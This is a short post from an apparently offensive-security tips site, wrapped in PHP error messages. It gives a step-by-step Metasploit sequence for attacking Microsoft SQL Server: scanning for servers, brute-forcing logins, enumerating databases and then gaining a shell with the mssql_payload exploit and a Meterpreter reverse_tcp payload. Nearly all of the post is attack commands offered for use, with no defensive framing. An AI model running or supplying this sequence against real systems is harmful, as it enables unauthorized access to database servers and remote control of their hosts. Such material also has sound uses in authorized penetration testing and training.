Warning: PHP Request Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0

Warning: PHP Request Startup: Session ini settings cannot be changed after headers have already been sent in Unknown on line 0

Warning: session_start(): Session cannot be started after headers have already been sent in /home/admud64/mrleet.com/user/database_connection.php on line 5
Attacking MSSQL with Metasploit ~ MrLeet

Back

Score 0

Title: Attacking MSSQL with MetasploitAuthor: ajayverma
[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate MSSQL Database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Like
|
Dislike
Submitted On: 2019-06-25 11:08:36




Warning: PHP Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0